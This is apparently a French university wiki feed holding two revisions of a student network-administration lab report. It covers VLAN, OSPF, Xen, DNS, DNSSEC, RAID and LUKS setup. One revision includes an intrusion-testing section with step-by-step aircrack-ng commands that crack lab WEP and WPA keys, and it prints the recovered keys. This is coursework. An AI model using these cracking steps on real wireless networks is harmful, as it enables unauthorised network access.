      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
On ajoute à notre fichier named.conf.options les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
 dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version&lt;br /&gt;
 dnssec-validation yes; //FOrcer le dnssec&lt;br /&gt;
&lt;br /&gt;
On génère ensuite nos clés, dans un fichier connus&lt;br /&gt;
&lt;br /&gt;
 cd /etc/bind/master&lt;br /&gt;
 dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site &lt;br /&gt;
 //Kanosteke59.site.+007+15849&lt;br /&gt;
 dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site&lt;br /&gt;
 //Kanosteke59.site.+007+60636&lt;br /&gt;
&lt;br /&gt;
ici on crée une clé pour du SHA-1&lt;br /&gt;
ON peut ensuite renommer les fichiers &lt;br /&gt;
 &lt;br /&gt;
 mv Kanosteke59.site.+007+60636.key  Kanosteke59.site.ksk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+60636.private  Kanosteke59.site.ksk.private&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.key  Kanosteke59.site.zsk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.private  Kanosteke59.site.zsk.private&lt;br /&gt;
&lt;br /&gt;
On ajoute dans la fin de définition du domaine :&lt;br /&gt;
&lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 &lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 $INCLUDE Kanosteke59.site.zsk.key&lt;br /&gt;
 $INCLUDE Kanosteke59.site.ksk.key&lt;br /&gt;
&lt;br /&gt;
On signe maintenant nos fichier de définition&lt;br /&gt;
 dnssec-signzone -o anosteke59.site  -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk&lt;br /&gt;
&lt;br /&gt;
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé&lt;br /&gt;
 zone &amp;quot;anosteke59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/master/anosteke59.site.signed&amp;quot;;&lt;br /&gt;
         notify yes;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour démarrer, nous formatons la clé :&lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :&lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte &lt;br /&gt;
 cryptsetup luksOpen /dev/sdb crypte&lt;br /&gt;
Puis nous le formatons&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypte &lt;br /&gt;
&lt;br /&gt;
Nous montons ensuite la partition afin d'y ajouter un fichier test :&lt;br /&gt;
 mkdir /mnt/cryptUSB&lt;br /&gt;
 mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/&lt;br /&gt;
&lt;br /&gt;
Nous créons ce fichier test.txt en y inscrivant &amp;quot;BONJOUR MONDE !&amp;quot; :&lt;br /&gt;
 nano /mnt/cryptUSB/test.txt&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons et fermons le volume chiffré :&lt;br /&gt;
 umount /mnt/cryptUSB&lt;br /&gt;
 cryptsetup luksClose crypte&lt;br /&gt;
&lt;br /&gt;
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57732</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57732"/>
				<updated>2022-01-10T16:28:43Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Chiffrement de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour démarrer, nous formatons la clé :&lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :&lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte &lt;br /&gt;
 cryptsetup luksOpen /dev/sdb crypte&lt;br /&gt;
Puis nous le formatons&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypte &lt;br /&gt;
&lt;br /&gt;
Nous montons ensuite la partition afin d'y ajouter un fichier test :&lt;br /&gt;
 mkdir /mnt/cryptUSB&lt;br /&gt;
 mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/&lt;br /&gt;
&lt;br /&gt;
Nous créons ce fichier test.txt en y inscrivant &amp;quot;BONJOUR MONDE !&amp;quot; :&lt;br /&gt;
 nano /mnt/cryptUSB/test.txt&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons et fermons le volume chiffré :&lt;br /&gt;
